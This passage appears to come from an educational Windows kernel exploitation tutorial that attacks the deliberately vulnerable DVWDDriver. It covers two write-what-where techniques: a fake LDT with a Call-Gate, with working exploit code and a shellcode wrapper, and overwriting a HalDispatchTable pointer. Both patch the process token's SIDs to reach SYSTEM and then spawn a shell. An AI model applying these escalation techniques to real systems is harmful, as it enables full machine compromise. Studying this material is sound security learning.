       +0x010 ProfileListHead  : _LIST_ENTRY
       +0x018 DirectoryTableBase : [2] Uint4B
       +0x020 LdtDescriptor    : _KGDTENTRY
       +0x028 Int21Descriptor  : _KIDTENTRY
       [...]
    

    2. Call-Gate

    A Call-Gate makes it possible to access code segments with different privilege levels:
    "Call-Gates facilitate controlled transfers of program control between different privilege levels. They are typically used only in operating systems or executives that use the privilege-level mechanism" (Intel Manual Vol. 3A & 3B [2], p. 201).

    A Call-Gate is a possible entry in the GDT or in an LDT. It is a special sort of descriptor called a Call-Gate Descriptor. It's the same size as a Segment Descriptor (8 bytes), but some fields aren't organized in the same way. The figure below is taken from [1] and clearly shows the differences:



    In practice, a Call-Gate is useful in order to jump to code located in a different segment and running with different privileges (ring). Here's how things work when we call a Call-Gate:
    1. The processor accesses the Call-Gate Descriptor,
    2. It locates the Code Segment Descriptor we finally want to access, by using the Segment Selector contained in the Call-Gate Descriptor,
    3. It retrieves the Base Address contained in the Code Segment Descriptor and adds to it the offset value contained in the Call-Gate Descriptor.
    4. The result is the linear address of the code we want to access (Code linear address = Base Address + Offset).

    The article [4] (in French) explains how we can add a Call-Gate that makes it possible to run code in Ring0 from Ring3. So, I won't repeat everything that is said in that great article, but just what is useful for us right now:

    • The "Segment Selector" field must refer to the Segment Descriptor under which our payload will be executed. Because we want to run it with full privileges in Ring0, we'll refer to the Kernel Code Segment (CS) Descriptor. The right value is 0x0008.
    • The "DPL" field must be equal to 3 if we want to be able to access the Call-Gate from userland.
    • The "Offset" field must be the address of the code we want to execute.
    • The "Type" field must be equal to 12 (0xC), the type of a 32-bit Call-Gate Descriptor.
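As an illustration of how these four fields end up in the 8 bytes of the descriptor, here is a C sketch that packs them into two 32-bit words according to the layout given in the Intel Manual (offset 15..0 and selector in the low word; offset 31..16, Present bit, DPL, type and parameter count in the high word). `gate_words` and `make_call_gate` are hypothetical names, and this is not the PrepareCallGate32() function of the DVWDExploit.

```c
#include <assert.h>
#include <stdint.h>

#define GATE_TYPE_CALL32 0xCu   /* type 12: 32-bit Call-Gate */

/* The 8 bytes of a descriptor, seen as two little-endian dwords. */
struct gate_words {
    uint32_t low;
    uint32_t high;
};

/* Packs the Call-Gate fields into descriptor format. */
static struct gate_words make_call_gate(uint32_t offset, uint16_t selector,
                                        unsigned dpl, unsigned param_count)
{
    struct gate_words g;

    assert(dpl <= 3 && param_count <= 31);
    g.low  = ((uint32_t)selector << 16) | (offset & 0xFFFFu);
    g.high = (offset & 0xFFFF0000u)     /* offset 31..16             */
           | (1u << 15)                 /* P: descriptor is present  */
           | ((uint32_t)dpl << 13)      /* DPL                       */
           | (GATE_TYPE_CALL32 << 8)    /* S = 0 and type = 0xC      */
           | param_count;               /* number of dwords to copy  */
    return g;
}
```

With a made-up offset of 0x12345678, selector 0x0008 and DPL 3, the two words are 0x00085678 and 0x1234EC00.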
    After that, we need to know how to call our Call-Gate...
    For that, we'll use the x86 instruction FAR CALL (opcode 0x9A). It's different from a classic CALL because we must specify an offset (32 bits) AND a Segment Selector (16 bits). In our case, we just need to put the right value in the Segment Selector, and we can leave the offset at 0x00000000. Indeed, the call is done in two steps here: the FAR CALL first reaches the Call-Gate Descriptor, and then the Call-Gate Descriptor points to the code we want to execute. Let's see how a Segment Selector is built:
    A Segment Selector is made of three fields, which we set as follows:
    • Bits 0,1 (Requested Privilege Level): we call the Call-Gate from userland, so we'll put the value 11 in binary (3 in decimal, for Ring3) here;
    • Bit 2 (Table Indicator): we'll put the value 1 because we'll put our Call-Gate Descriptor into the LDT;
    • Bits 3..15: this is the index into the GDT/LDT (here into the LDT). We'll put our Call-Gate at the first position in the LDT, so we'll put the value 0 here.
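The three fields can be combined and decoded with a few shifts. The C sketch below uses hypothetical helper names. The only facts it relies on are the bit positions listed above and the selector values quoted in this article (0x0008 for the kernel code segment, 0x30 and 0x3B for FS).

```c
#include <assert.h>
#include <stdint.h>

/* Builds a Segment Selector from its three fields. */
static uint16_t make_selector(uint16_t index, unsigned ti, unsigned rpl)
{
    assert(index < 8192 && ti <= 1 && rpl <= 3);
    return (uint16_t)((index << 3) | (ti << 2) | rpl);
}

/* Bits 3..15: index into the GDT or LDT. */
static unsigned selector_index(uint16_t sel) { return sel >> 3; }

/* Bit 2: 0 = GDT, 1 = LDT. */
static unsigned selector_ti(uint16_t sel) { return (sel >> 2) & 1u; }

/* Bits 0..1: Requested Privilege Level. */
static unsigned selector_rpl(uint16_t sel) { return sel & 3u; }
```

With index 0, TI = 1 and RPL = 3, the selector is 0x0007. Decoding the other way, 0x0008 is GDT entry 1 with RPL 0, and 0x3B is GDT entry 7 with RPL 3.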

    3. Methodology of exploitation

    Now that we've got the background about GDT and LDT, we can move on to the exploitation...
    Basically, the exploitation consists in creating a new LDT. Then, we add a new entry into that LDT - just one entry - a Call-Gate Descriptor, by putting the right values in the fields as explained before...


    And then, we need to use the write-what-where vulnerability in order to overwrite the LDT descriptor of the process with a descriptor corresponding to the fake LDT that has been previously created. Here:
    • what = LDT descriptor of the fake LDT,
    • where = location of the LDT descriptor that the kernel loads into the GDT. This descriptor is a KGDTENTRY structure called LdtDescriptor, which is a field of the _KPROCESS structure (the structure used by the kernel to store information about a specific process), as we've seen before. So, we can get the address where we want to write by retrieving the address of _KPROCESS (== address of _EPROCESS) and adding the right offset to it (0x20 for Windows Server 2003 SP2).
    Finally, we can call our Call-Gate by making a FAR CALL on the first (and only) entry in the LDT of the current process. This will allow us to jump to our shellcode.

    4. Shellcoding

    Okay, we've briefly seen how the exploitation works. We will re-use the shellcode used in the previous article about exploiting write-what-where vulnerabilities with HalDispatchTable. But there is an additional problem here... we need to be able to return from the Call-Gate after the execution of our payload. A FAR CALL is made to jump to the Call-Gate, that is to say the code segment changes, so we need to use a FAR RET (0xCB) and not a simple RET after the execution. By doing so, we will be able to move on to the next instruction in our exploit program.

    Moreover, it's important to remember that the FS segment register points to the KPCR structure (Kernel Processor Control Region) in kernel-mode, but not in user-mode, where it points to the TEB structure (Thread Environment Block). Indeed:
    • In Kernel-Mode, FS=0x30
    • In User-Mode, FS=0x3B
    Therefore, we have to set FS to the value 0x30 before executing our shellcode in kernelland, and then we must put its value back to 0x3B before returning.

    It is for these two reasons that the authors of the DVWDExploit have written a wrapper (ReturnFromGate) in ASM that performs those operations. It is the address of this wrapper that must be put into the Offset field of the Call-Gate Descriptor.

    5. Exploitation in details

    Okay, we've got all the elements to fully understand the exploit. Here is how it works:
    1. Retrieve the address of the payload that will be executed in kernel mode (named KernelPayload), that's to say the code that patches the current process' Access Token.
    2. Retrieve the address of the _KPROCESS structure.
    3. Retrieve the address of the LDT descriptor, located at the address of _KPROCESS + offset (0x20).
    4. Create a new LDT using the ZwSetInformationProcess() syscall within ntdll.dll. This is done in the function called SetLDTEnv().
    5. Put the address of KernelPayload into the wrapper ReturnFromGate so that the wrapper can call the shellcode. Then, copy this wrapper into executable memory.
    6. Build the Call-Gate Descriptor in the function called PrepareCallGate32(). We've already seen how to fill the fields of the Call-Gate in order to run code in Ring 0 from Ring 3.
    7. Build the LDT Descriptor that corresponds to the previously created LDT. This is done by the function called PrepareLDTDescriptor32().
    8. Use the vulnerability to overwrite the LDT descriptor with the one corresponding to the fake LDT that has been previously created:
      • Store the new LDT descriptor into the GlobalOverwriteStruct thanks to the DVWDDriver's IOCTL DEVICEIO_DVWD_STORE.
      • Write this new LDT descriptor - contained in GlobalOverwriteStruct - at the location of the existing LDT descriptor, thanks to the DVWDDriver's IOCTL DEVICEIO_DVWD_OVERWRITE.
    9. Then, we need to force a process context switch. Indeed, the LDT Segment Descriptor in the GDT is updated only after a context switch. To do so, we just sleep for a second.
    10. Finally, we make our FAR CALL to the Call-Gate. That triggers the execution of the wrapper and then of our shellcode in kernel mode.
    11. When we return from our shellcode, the process is running with Owner SID = NT AUTHORITY\SYSTEM, so we can do what we want!
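
    Steps 6 and 7 boil down to packing a few fields into two 8-byte descriptors. The sketch below does this with plain shifts instead of the bitfield structures used by the exploit, following the descriptor layouts given in the Intel manual. The function and macro names are my own (hypothetical), and the addresses used in the usage note are made up.

```c
#include <assert.h>
#include <stdint.h>

#define DESC_PRESENT      (1u << 15)  /* P bit, in the high dword */
#define TYPE_LDT          0x2u        /* system descriptor type: LDT */
#define TYPE_CALL_GATE32  0xCu        /* system descriptor type: 32-bit call gate */

/* 32-bit call gate: target offset split in two halves around the
 * code segment selector, plus DPL and parameter count. */
uint64_t pack_call_gate32(uint32_t offset, uint16_t selector,
                          unsigned dpl, unsigned param_count) {
    assert(dpl <= 3u && param_count <= 31u);
    uint32_t low  = ((uint32_t)selector << 16) | (offset & 0x0000FFFFu);
    uint32_t high = (offset & 0xFFFF0000u)
                  | DESC_PRESENT
                  | ((uint32_t)dpl << 13)
                  | (TYPE_CALL_GATE32 << 8)
                  | param_count;
    return ((uint64_t)high << 32) | low;
}

/* LDT descriptor: 32-bit base and 20-bit limit scattered over 8 bytes,
 * DPL left at 0 and granularity left at byte units. */
uint64_t pack_ldt_descriptor(uint32_t base, uint32_t limit) {
    assert(limit <= 0xFFFFFu);
    uint32_t low  = ((base & 0x0000FFFFu) << 16) | (limit & 0x0000FFFFu);
    uint32_t high = (base & 0xFF000000u)
                  | (limit & 0x000F0000u)
                  | DESC_PRESENT
                  | (TYPE_LDT << 8)
                  | ((base >> 16) & 0xFFu);
    return ((uint64_t)high << 32) | low;
}
```

    For instance, a gate to offset 0x12345678 through selector 0x08 with DPL 3 packs to 0x1234EC0000085678, and an LDT based at 0x12345678 with limit 0xFFFF packs to 0x120082345678FFFF.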
    A figure might help to understand... =) 




    6. Exploit code

    Here is a code snippet from DVWDExploit with many comments I've added. The full code is available in the archive:

    // ----------------------------------------------------------------------------
    // Arbitrary Memory Overwrite exploitation ------------------------------------
    // ---- Method using LDT  -----------------------------------------------------
    // ----------------------------------------------------------------------------
    
    
    typedef NTSTATUS (WINAPI *_ZwSetInformationProcess)(HANDLE ProcessHandle, 
                           PROCESS_INFORMATION_CLASS ProcessInformationClass,  
                           PPROCESS_LDT_INFORMATION ProcessInformation,
                           ULONG ProcessInformationLength);    
    
    // Fill the Call-Gate Descriptor -------------------------------------------------
    VOID PrepareCallGate32(PCALL_GATE32 pGate, PVOID Payload) {
    
     ULONG_PTR IPayload = (ULONG_PTR)Payload;
    
     RtlZeroMemory(pGate, sizeof(CALL_GATE32));
     
     pGate->Fields.OffsetHigh   = (IPayload & 0xFFFF0000) >> 16;
     pGate->Fields.OffsetLow    = (IPayload & 0x0000FFFF);
     pGate->Fields.Type     = 12;   // Gate Descriptor
     pGate->Fields.Param    = 0;
     pGate->Fields.Present    = 1;
     pGate->Fields.SegmentSelector  = 1 << 3;  // Kernel Code Segment Selector
     pGate->Fields.Dpl     = 3;
    }
    
    // Setup the LDT descriptor ------------------------------------------------------
    VOID PrepareLDTDescriptor32(PLDT_ENTRY pLDTDesc, PVOID LDTBasePtr) {
    
     ULONG_PTR LDTBase = (ULONG_PTR)LDTBasePtr;
    
     RtlZeroMemory(pLDTDesc, sizeof(LDT_ENTRY));
     
     pLDTDesc->BaseLow     = LDTBase & 0x0000FFFF;
     pLDTDesc->LimitLow     = 0xFFFF;
     pLDTDesc->HighWord.Bits.BaseHi  = (LDTBase & 0xFF000000) >> 24;
     pLDTDesc->HighWord.Bits.BaseMid = (LDTBase & 0x00FF0000) >> 16;
     pLDTDesc->HighWord.Bits.Type = 2;
     pLDTDesc->HighWord.Bits.Pres  = 1;
    }
    
    
    // Assembly wrapper to the payload to be able to return from the Call-Gate ------
    // (using a FAR RET)
    #define OFFSET_SHELLCODE 18
    CHAR ReturnFromGate[]="\x90\x90\x90\x90\x90\x90\x90\x90"
           "\x60"                  // pushad       save general purpose registers
           "\x0F\xA0"              // push  fs     save FS segment register
           "\x66\xB8\x30\x00"      // mov  ax, 30h   
           // FS value is different between userland (0x3B) and kernelland (0x30)
           "\x8E\xE0"              // mov  fs, ax     
           "\xB8\x41\x41\x41\x41"  // mov  eax, @Shellcode  invoke the payload
           "\xFF\xD0"              // call  eax  
           "\x0F\xA1"              // pop   fs     restore FS segment register
           "\x61"                  // popad        restore general purpose registers
           "\xcb";                 // retf       far ret
    
           
    // Assembly code that executes a CALL to 0007:00000000 ----------------------------
    // (Segment selector: 0x0007, offset address: 0x00000000)
    // 16-bit segment selector:
    // [ 13-bit index into GDT/LDT ][0=descriptor in GDT/1=descriptor in LDT]
    // [Requested Privilege Level: 00=ring0/11=ring3]
    // => 0007 means: index 0 into LDT (first entry), descriptor in LDT, ring3
    VOID FarCall() {
     __asm { 
       _emit 0x9A
       _emit 0x00
       _emit 0x00
       _emit 0x00
       _emit 0x00
       _emit 0x07
       _emit 0x00
     }
    }
    
    // Use the vulnerability to overwrite the LDT Descriptor into GDT ------------------
    BOOL OverwriteGDTEntry(ULONG64 LDTDesc, PVOID *KGDTEntry) {
    
     HANDLE hFile;
     ARBITRARY_OVERWRITE_STRUCT overwrite;
     ULONG64 storage = LDTDesc;
     BOOL ret;
     DWORD dwReturn;
    
     hFile = CreateFile(L"\\\\.\\DVWD", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);
    
     if(hFile != INVALID_HANDLE_VALUE) {
      overwrite.Size = 8;
      overwrite.StorePtr = (PVOID)&storage;
      ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STORE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
    
      overwrite.Size = 8;
      overwrite.StorePtr = (PVOID)KGDTEntry;
      ret = DeviceIoControl(hFile, DEVICEIO_DVWD_OVERWRITE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
    
      CloseHandle(hFile);
    
      return TRUE;
     }
    
     return FALSE;
    }
    
    
    // Create a new LDT using ZwSetInformationProcess ----------------------------------
    BOOL SetLDTEnv(VOID) {
    
     NTSTATUS retStatus;
     LDT_ENTRY eLdt;
     PROCESS_LDT_INFORMATION infoLdt; 
     _ZwSetInformationProcess ZwSetInformationProcess;
    
     // Retrieve the address of the undocumented syscall ZwSetInformationProcess()
     ZwSetInformationProcess = (_ZwSetInformationProcess)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "ZwSetInformationProcess");
    
     if(!ZwSetInformationProcess)
      return FALSE;
    
     // Create and initialize a new LDT
     RtlZeroMemory(&eLdt, sizeof(LDT_ENTRY));
    
     RtlCopyMemory(&(infoLdt.LdtEntries[0]), &eLdt, sizeof(LDT_ENTRY));
     infoLdt.Start = 0;
     infoLdt.Length = sizeof(LDT_ENTRY);
    
     retStatus = ZwSetInformationProcess(GetCurrentProcess(), 
                 ProcessLdtInformation, 
                 &infoLdt, 
                 sizeof(PROCESS_LDT_INFORMATION));
    
     if(retStatus != STATUS_SUCCESS)
      return FALSE;
    
     return TRUE;
    }
    
    
    #define LDT_DESC_FROM_KPROCESS 0x20
    ULONG64 LDTDescStorage32=0;
    
    // Main function -------------------------------------------------------------------
    BOOL LDTDescOverwrite32(VOID) {
    
     PVOID kprocess,kprocessLDTDesc;
     PLDT_ENTRY pLDTDesc = (PLDT_ENTRY)&LDTDescStorage32;
     PVOID ReturnFromGateArea = NULL;
     PCALL_GATE32 pGate = NULL;
    
     // User standard SIDList Patch
     FARPROC KernelPayload = (FARPROC)UserShellcodeSIDListPatchCallGate;
    
     // Retrieve the KPROCESS Address == EPROCESS Address
     kprocess = FindCurrentEPROCESS();
     if(!kprocess)
      return FALSE;
    
     // Address of LDT Descriptor
     // kd> dt nt!_kprocess
     kprocessLDTDesc = (PBYTE)kprocess + LDT_DESC_FROM_KPROCESS;
     printf("[--] kprocessLDTDesc found at: %p\n", kprocessLDTDesc);
    
     // Create a new LDT entry
     if(!SetLDTEnv())
      return FALSE;
    
     // Fixup the Gate Payload (replace 0x41414141 by the address of the kernel payload)
     // and put it into executable memory
     RtlCopyMemory(ReturnFromGate + OFFSET_SHELLCODE, &KernelPayload, sizeof(FARPROC));
     ReturnFromGateArea = CreateUspaceExecMapping(1);
     RtlCopyMemory(ReturnFromGateArea, ReturnFromGate, sizeof(ReturnFromGate));
    
     // Build the Call-Gate (system descriptor); we pass the address of the wrapper
     pGate = CreateUspaceMapping(1);
     PrepareCallGate32(pGate, (PVOID)ReturnFromGateArea);
    
     // Build the fake LDT Descriptor with a Call-Gate (the one previously created) 
     PrepareLDTDescriptor32(pLDTDesc, (PVOID)pGate);
    
     printf("[--] LDT Descriptor fake: 0x%llx\n", LDTDescStorage32);
    
     // Trigger the vulnerability: overwrite the LdtDescriptor field in KPROCESS
     OverwriteGDTEntry(LDTDescStorage32, kprocessLDTDesc);
     
     // We force a process context switch
     // Indeed, the LDT segment descriptor into the GDT is updated only after a context 
     // switch. So, it's needed before being able to use the Call-Gate
     Sleep(1000);
    
     // Trigger the call gate via a FAR CALL (see assembly code)
     FarCall();
    
     return TRUE;
    }
    
    
    // This is where we begin ... ------------------------------------------------
    BOOL TriggerOverwrite32_LDTRemappingWay() {
     
     // Load the Kernel Executive ntoskrnl.exe in userland and get some symbol's kernel address
     if(LoadAndGetKernelBase() == FALSE)
      return FALSE;
    
     // We exploit the vulnerability with a payload that patches the SID list to get 
     // SYSTEM privilege and then we spawn a shell if it succeeds
     if(LDTDescOverwrite32() == TRUE) {
      if (CreateChild(_T("C:\\WINDOWS\\SYSTEM32\\CMD.EXE")) != TRUE) {
       wprintf(L"Error: unable to spawn process, Error: %d\n", GetLastError());
       return FALSE;
      }
     }
     
     return TRUE;
    }
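
    The "fixup" of the wrapper is the step that is the easiest to get wrong, because OFFSET_SHELLCODE must point exactly at the 4-byte immediate of the mov eax instruction. Here is a small, portable sketch of that step alone; build_wrapper is a hypothetical helper of mine (the exploit does this inline with RtlCopyMemory), and the bytes are only copied and patched here, never executed.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define OFFSET_SHELLCODE 18

/* Same bytes as ReturnFromGate, written as an array initializer. */
static const unsigned char wrapper_template[] = {
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, /* nop x8 */
    0x60,                                           /* pushad */
    0x0F, 0xA0,                                     /* push fs */
    0x66, 0xB8, 0x30, 0x00,                         /* mov ax, 30h */
    0x8E, 0xE0,                                     /* mov fs, ax */
    0xB8, 0x41, 0x41, 0x41, 0x41,                   /* mov eax, imm32 (placeholder) */
    0xFF, 0xD0,                                     /* call eax */
    0x0F, 0xA1,                                     /* pop fs */
    0x61,                                           /* popad */
    0xCB                                            /* retf */
};

/* Copy the template into dst and replace the 0x41414141 placeholder
 * with payload_addr (little-endian). Returns the wrapper size. */
size_t build_wrapper(unsigned char *dst, size_t dst_len, uint32_t payload_addr) {
    assert(dst != NULL && dst_len >= sizeof wrapper_template);
    /* The immediate must directly follow the B8 opcode (mov eax, imm32). */
    assert(wrapper_template[OFFSET_SHELLCODE - 1] == 0xB8);
    memcpy(dst, wrapper_template, sizeof wrapper_template);
    for (int i = 0; i < 4; i++)
        dst[OFFSET_SHELLCODE + i] = (unsigned char)(payload_addr >> (8 * i));
    return sizeof wrapper_template;
}
```

    Counting the bytes confirms the value 18: 8 (nop) + 1 (pushad) + 2 (push fs) + 4 (mov ax) + 2 (mov fs) + 1 (the B8 opcode) = 18.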
    


    7. w00t ?


    The exploit is working well as we can see:

    w00t again !!


    References

    [1] GDT and LDT in Windows kernel vulnerability exploitation, by Matthew "j00ru" Jurczyk & Gynvael Coldwind, Hispasec (16 January 2010)

    [2] Intel Manual Vol. 3A & 3B
    http://www.intel.com/products/processor/manuals/

    [3] Task State Segment (TSS)

    Windows Kernel Exploitation Basics - Part 2 : Arbitrary Memory Overwrite exploitation using HalDispatchTable



    In this article, we will see a method to exploit the write-what-where vulnerability (Arbitrary Memory Overwrite) present in the DVWDDriver. This method consists of overwriting a pointer in a kernel dispatch table. Such tables are used by the kernel to store various pointers. Examples of such tables:
    • The SSDT (System Service Descriptor Table) nt!KeServiceDescriptorTable stores addresses of syscalls; it is used by the kernel in order to dispatch syscalls (more information in [1]).
    • The HAL Dispatch Table nt!HalDispatchTable. The HAL (Hardware Abstraction Layer) isolates the OS from the hardware. Basically, it makes it possible to run the same OS on machines with different hardware. This table stores pointers to routines used by the HAL.
    Here, we will overwrite a specific pointer in the HalDispatchTable. Let's see why and how... =) The main reference for everything summed up here is the paper [2].

    1. NtQueryIntervalProfile() and HalDispatchTable

    According to [3], NtQueryIntervalProfile() is an undocumented system call exported by ntdll.dll that retrieves the currently set delay between performance counter ticks. It calls the KeQueryIntervalProfile() function exported by the kernel executive ntoskrnl.exe. If we disassemble that function, we can see the following:



    So, a call is made to the routine whose address is stored at nt!HalDispatchTable+0x4 (see the red box). Therefore, if we overwrite the pointer at that address - that's to say the second pointer in the HalDispatchTable - with the address of our shellcode, and then call the function NtQueryIntervalProfile(), our shellcode will be executed!


    2. Methodology of exploitation

    Note: GlobalOverwriteStruct is the global structure used by the driver for storing a buffer and its size.

    In order to exploit the Arbitrary Memory Overwrite vulnerability, the basic idea is to:
    1. Use the DVWDDriver's IOCTL DEVICEIO_DVWD_STORE to store the address of our shellcode in the buffer of the GlobalOverwriteStruct structure that lies in kernelland. Remember that the address we pass as a parameter must be in the user address space (i.e. address <= 0x7FFFFFFF) because the IOCTL handler checks it with the function ProbeForRead(). No problem: we just pass a pointer to the address of our shellcode (of course, that pointer lies in userland)! So, the struct we pass to the driver contains this pointer and the value 4 for the size of the buffer.
    2. Then, use the DVWDDriver's IOCTL DEVICEIO_DVWD_OVERWRITE to write the content of the buffer of GlobalOverwriteStruct - that's to say the previously stored address of the shellcode - to the address passed as a parameter. This time, there is no check in the IOCTL handler, so this address can be anywhere, in userland or in kernelland. Therefore, we pass the address of the second entry in the HalDispatchTable, which is of course in kernelland.
    So to sum up, we abuse the IOCTL DEVICEIO_DVWD_OVERWRITE in order to write what we want, where we want:
    • what =  address of our shellcode,
    • where = address of nt!HalDispatchTable+0x4
    It's important to understand that it's necessary to control those 2 components in order to exploit that kind of vulnerability.
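
    To make the two-step primitive concrete, here is a user-mode simulation that runs without any driver. Everything in it is a stand-in I made up for illustration: g_store plays the role of GlobalOverwriteStruct, sim_store and sim_overwrite mimic the two IOCTLs, and dispatch_table is an ordinary array of function pointers, not the real HalDispatchTable.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef int (*handler_fn)(void);

/* Stand-in for the driver's global structure (buffer + size). */
static struct { unsigned char buf[16]; size_t size; } g_store;

/* "STORE": copy caller-supplied bytes into the global buffer. */
int sim_store(const void *src, size_t size) {
    if (size > sizeof g_store.buf) return 0;
    memcpy(g_store.buf, src, size);
    g_store.size = size;
    return 1;
}

/* "OVERWRITE": copy the stored bytes to dst, with no check on dst. */
void sim_overwrite(void *dst) {
    memcpy(dst, g_store.buf, g_store.size);
}

int original_handler(void) { return 0; }
int payload(void)          { return 1337; }

/* Stand-in dispatch table; entry 1 is the one that gets called. */
handler_fn dispatch_table[4] = {
    original_handler, original_handler, original_handler, original_handler
};

/* what = address of payload, where = second entry of the table. */
int run_demo(void) {
    handler_fn what = payload;
    int stored = sim_store(&what, sizeof what);
    assert(stored);
    (void)stored;
    sim_overwrite(&dispatch_table[1]);
    return dispatch_table[1]();   /* now reaches payload() */
}
```

    Calling run_demo() returns 1337 while the other table entries still return 0, which is the whole point: only the chosen pointer has been replaced.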

    NB: Here, we can overwrite the whole address (4 bytes), but we can imagine a case where we can only overwrite 1 byte. In such a scenario, we overwrite the MSB (Most Significant Byte) of the second entry of HalDispatchTable with a value that moves the address into userland (< 0x80000000): for example, 0x01. Since the three low bytes keep their original value, we then need to cover the address range 0x01000000-0x01FFFFFF with a large NOP sled (memory marked as RWX), with a jump to our shellcode at the end.

    Hey... wait ! I have to talk about the shellcode we use...


    3. Shellcoding... patch my Access Token and go back to Ring 3
     
    It's not like exploiting software in userland: here our shellcode is executed in kernelland, so we can't afford any mistake or we'll get a BSOD in our face. Typically, in local kernel exploitation, we use the full privileges we have in Ring 0 to patch the Access Token of the current process, replacing the User SID of the process with the SID of NT AUTHORITY\SYSTEM. Then, we go back to Ring 3 as quickly as possible, where we can do what we want, such as spawning a shell.

    In Windows, the Access Token (or just Token) describes the security context of a process or a thread. In particular, it stores the User SID, a list of Group SIDs and a list of Privileges. Based on this information, the kernel is able to decide whether an action requested by the process is authorized or not (access control). In user space, it's possible to get a handle on a Token. More information about Tokens is given in [4].
    Here is the detail of the structure _TOKEN used for describing an Access Token:

    kd> dt nt!_token
       +0x000 TokenSource      : _TOKEN_SOURCE
       +0x010 TokenId          : _LUID
       +0x018 AuthenticationId : _LUID
       +0x020 ParentTokenId    : _LUID
       +0x028 ExpirationTime   : _LARGE_INTEGER
       +0x030 TokenLock        : Ptr32 _ERESOURCE
       +0x038 AuditPolicy      : _SEP_AUDIT_POLICY
       +0x040 ModifiedId       : _LUID
       +0x048 SessionId        : Uint4B
       +0x04c UserAndGroupCount : Uint4B
       +0x050 RestrictedSidCount : Uint4B
       +0x054 PrivilegeCount   : Uint4B
       +0x058 VariableLength   : Uint4B
       +0x05c DynamicCharged   : Uint4B
       +0x060 DynamicAvailable : Uint4B
       +0x064 DefaultOwnerIndex : Uint4B
       +0x068 UserAndGroups    : Ptr32 _SID_AND_ATTRIBUTES
       +0x06c RestrictedSids   : Ptr32 _SID_AND_ATTRIBUTES
       +0x070 PrimaryGroup     : Ptr32 Void
       +0x074 Privileges       : Ptr32 _LUID_AND_ATTRIBUTES
       +0x078 DynamicPart      : Ptr32 Uint4B
       +0x07c DefaultDacl      : Ptr32 _ACL
       +0x080 TokenType        : _TOKEN_TYPE
       +0x084 ImpersonationLevel : _SECURITY_IMPERSONATION_LEVEL
       +0x088 TokenFlags       : UChar
       +0x089 TokenInUse       : UChar
       +0x08c ProxyData        : Ptr32 _SECURITY_TOKEN_PROXY_DATA
       +0x090 AuditData        : Ptr32 _SECURITY_TOKEN_AUDIT_DATA
       +0x094 LogonSession     : Ptr32 _SEP_LOGON_SESSION_REFERENCES
       +0x098 OriginatingLogonSession : _LUID
       +0x0a0 VariablePart     : Uint4B

    The list of pointers to SIDs is stored in the field UserAndGroups (type _SID_AND_ATTRIBUTES). We can retrieve information contained into a Token for a given process with kd, as follows (example with the "System" process):

    kd> !process 0004
    Searching for Process with Cid == 4
    Cid handle table at e1ed7000 with 428 entries in use
    
    PROCESS 827a6648  SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
        DirBase: 00587000  ObjectTable: e1000c60  HandleCount: 388.
        Image: System
        VadRoot 82337238 Vads 4 Clone 0 Private 3. Modified 5664. Locked 0.
        DeviceMap e1001070
        Token                             e1001720
        ElapsedTime                       00:37:34.750
        UserTime                          00:00:00.000
        KernelTime                        00:00:01.578
        QuotaPoolUsage[PagedPool]         0
        QuotaPoolUsage[NonPagedPool]      0
        Working Set Sizes (now,min,max)  (43, 0, 345) (172KB, 0KB, 1380KB)
        PeakWorkingSetSize                526
        VirtualSize                       1 Mb
        PeakVirtualSize                   2 Mb
        PageFaultCount                    4829
        MemoryPriority                    BACKGROUND
        BasePriority                      8
        CommitCharge                      8
    
    
    kd> !token e1001720
    _TOKEN e1001720
    TS Session ID: 0
    User: S-1-5-18
    Groups:
     00 S-1-5-32-544
        Attributes - Default Enabled Owner
     01 S-1-1-0
        Attributes - Mandatory Default Enabled
     02 S-1-5-11
        Attributes - Mandatory Default Enabled
    Primary Group: S-1-5-18
    Privs:
     00 0x000000007 SeTcbPrivilege                    Attributes - Enabled Default
     01 0x000000002 SeCreateTokenPrivilege            Attributes -
     02 0x000000009 SeTakeOwnershipPrivilege          Attributes -
    [...]

    Well, the idea is actually to replace the pointer to the process owner's SID with a pointer to the built-in NT AUTHORITY\SYSTEM SID (S-1-5-18). We also replace the group BUILTIN\Users SID (S-1-5-32-545) with the group BUILTIN\Administrators SID (S-1-5-32-544).

    The source code is in the file Shellcode32.c. It's taken from DVWDDriver; I've just added many comments to make it easier to understand.


    4. To sum up...
     
    Here is what we need to do in the exploit:
    1. Load the kernel executive ntoskrnl.exe in userland in order to get the offset of HalDispatchTable and then deduce its address in kernelland.
    2. Retrieve the address of our shellcode. This is actually the address of the function that patches the Access Token. But... there is a tricky point to notice: the pointer that we overwrite in HalDispatchTable normally points to a function which takes 4 arguments (4 values are pushed on the stack before: call dword ptr [nt!HalDispatchTable+0x4]). Therefore, we use a shellcode function with 4 arguments, just for compatibility reasons.
    3. Retrieve the address of the syscall NtQueryIntervalProfile() within ntdll.dll.
    4. Overwrite the pointer at nt!HalDispatchTable+0x4 with the address of our shellcode function... yeah, the one with 4 arguments that patches the process' Token. This is done by calling DeviceIoControl() twice in a row to send 2 IOCTLs: DEVICEIO_DVWD_STORE and then DEVICEIO_DVWD_OVERWRITE, as explained in paragraph 2.
    5. Call the function NtQueryIntervalProfile() in order to launch the shellcode.
    6. Well... at this point the process is running under the System account, so we're done and we can spawn a shell for example, or do whatever else we want!
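
    Step 1 relies on a simple rebasing computation: the offset of a symbol inside the image is the same whether the image is mapped in userland or in kernelland. Here is a sketch of that arithmetic, assuming we already know the three addresses involved. The function names are hypothetical and the numbers in the usage note are made up; this is not the body of LoadAndGetKernelBase(), which is not shown here.

```c
#include <assert.h>
#include <stdint.h>

/* Rebase a symbol found in a user-mode mapping of ntoskrnl.exe onto the
 * address where the kernel actually has the image loaded. */
uint32_t kernel_symbol_address(uint32_t user_image_base,
                               uint32_t user_symbol_addr,
                               uint32_t kernel_image_base) {
    assert(user_symbol_addr >= user_image_base);
    uint32_t offset = user_symbol_addr - user_image_base;
    return kernel_image_base + offset;
}

/* Address of the n-th pointer (0-based) of a table of 32-bit pointers. */
uint32_t table_entry_address(uint32_t table_addr, uint32_t n) {
    return table_addr + n * 4u;
}
```
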